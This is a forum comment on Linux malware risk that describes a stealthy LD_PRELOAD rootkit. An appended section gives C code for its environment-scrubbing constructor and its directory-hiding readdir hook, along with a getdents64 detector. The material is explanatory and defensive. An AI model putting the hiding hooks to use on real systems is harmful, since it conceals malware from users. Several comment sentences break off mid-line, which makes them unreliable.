Comment Re:Malware and Worms in GNU/Linux and *BSD (Score 1) 600
Looks scary, right? Wrong. Because the solution is as simple as changing the default policy. Make it so that the default behavior is to notify only. On every system update the user should be told: "Go start the updater via the system menu. By the way, if you EVER see an 'updater' you didn't start yourself, you are being pwned." Make sure that the system menu is strictly read-only, and even the dimmest user will be safe.
This will make it more difficult to trick the user, but not impossible. As long as the system menu is running with the user's privileges, it can be modified to launch a different program. And even if you find a way to prevent the user from messing with it - e.g., run it as a different user - the user won't be able to make any legitimate changes, either.
It's even easier for command-line tools: add a line to
Finally, here's a way to create almost undetectable malware. Add the line "LD_PRELOAD=~/.malware.so" to
- Removes the LD_PRELOAD variable from the environment, so it's undetectable.
- Modifies "exec..." functions so they add LD_PRELOAD back (and also replace "su", "sudo", etc. with a different program).
- Modifies "open" and "read" functions so the line in
- Modifies "opendir" and "readdir" to make ~/.malware.so invisible to the user.
- etc.
(This would work for any application - not just command-line ones.)
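As an added example (not code from the poster above), the following C file shows the shape of the LD_PRELOAD trick the comment describes, reduced to two of its bullets, together with the check a defender can use against it. It assumes Linux/glibc, that the library to hide is named with the prefix ".malware" (the comment's ~/.malware.so), and it hooks only readdir(); the exec, open and read hooks the comment lists are left out. The constructor scrubs LD_PRELOAD from the libc copy of the environment, the readdir() replacement resolves the real function with dlsym(RTLD_NEXT) and drops matching entries, and readdir_is_hooked() compares that filtered view against the raw getdents64 syscall, which a userland hook cannot intercept. The scratch directory and file names are constructed for the demo. Built with gcc -shared -fPIC it becomes a preloadable library; built as a plain executable (as here) the hook still intercepts the program's own readdir() calls, so the detection routine catches it.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Assumed name of the preloaded library: any directory entry starting with
 * this prefix is hidden from readdir(). */
#define HIDE_PREFIX ".malware"

/* Bullet 1 of the comment: runs when the object is loaded, before main(),
 * and removes LD_PRELOAD from libc's environment so "env" shows nothing. */
__attribute__((constructor))
static void scrub_env(void) { unsetenv("LD_PRELOAD"); }

/* Hiding policy kept separate so it can be tested without the hook. */
int should_hide(const char *name) {
    return strncmp(name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0;
}

/* Bullet 4 of the comment: replacement readdir(). The real libc readdir is
 * found with RTLD_NEXT; entries matching the prefix are skipped. */
struct dirent *readdir(DIR *dirp) {
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    if (!real_readdir)
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
    struct dirent *ent;
    while ((ent = real_readdir(dirp)) != NULL)
        if (!should_hide(ent->d_name))
            return ent;
    return NULL;
}

/* Defender side: count entries through libc (hookable) and through the raw
 * getdents64 syscall (not hookable from a preloaded .so). Layout of the
 * kernel's linux_dirent64 record, declared here because glibc does not
 * export it. */
struct linux_dirent64 {
    unsigned long long d_ino;
    long long d_off;
    unsigned short d_reclen;
    unsigned char d_type;
    char d_name[];
};

int count_via_readdir(const char *path) {
    DIR *d = opendir(path);
    if (!d) return -1;
    int n = 0;
    while (readdir(d) != NULL) n++;   /* goes through the hook above */
    closedir(d);
    return n;
}

int count_via_getdents64(const char *path) {
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    char buf[8192];
    int n = 0;
    for (;;) {
        long nread = syscall(SYS_getdents64, fd, buf, sizeof buf);
        if (nread <= 0) break;
        for (long pos = 0; pos < nread;) {
            struct linux_dirent64 *e = (struct linux_dirent64 *)(buf + pos);
            n++;
            pos += e->d_reclen;
        }
    }
    close(fd);
    return n;
}

/* 1 if the two views disagree (something is filtering readdir), 0 if they
 * agree, -1 on error. */
int readdir_is_hooked(const char *path) {
    int a = count_via_readdir(path), b = count_via_getdents64(path);
    if (a < 0 || b < 0) return -1;
    return a != b;
}

/* Demo: scratch directory with "visible.txt" and ".malware.so" (constructed
 * names). readdir() reports ".", "..", "visible.txt"; getdents64 reports
 * all four, so the mismatch exposes the hook. */
int demo_detect(void) {
    char dir[] = "/tmp/ldpreload-demo-XXXXXX";
    if (!mkdtemp(dir)) return -1;
    const char *names[] = {"visible.txt", ".malware.so"};
    char path[512];
    for (int i = 0; i < 2; i++) {
        snprintf(path, sizeof path, "%s/%s", dir, names[i]);
        FILE *f = fopen(path, "w");
        if (f) fclose(f);
    }
    int hooked = readdir_is_hooked(dir);
    for (int i = 0; i < 2; i++) {
        snprintf(path, sizeof path, "%s/%s", dir, names[i]);
        unlink(path);
    }
    rmdir(dir);
    return hooked;
}

int main(void) {
    printf("%s\n", demo_detect() == 1 ? "readdir() is filtering entries"
                                      : "both views agree");
    return 0;
}
```

The same comparison works against any userland hook: a preloaded library sits between the program and libc, never between libc and the kernel, so anything enumerated with a direct syscall (or by a statically linked tool) is the ground truth. Scanning shell rc files and /etc/ld.so.preload for LD_PRELOAD lines is the cheaper first check, but as the comment notes, a hooked open()/read() can lie about those too.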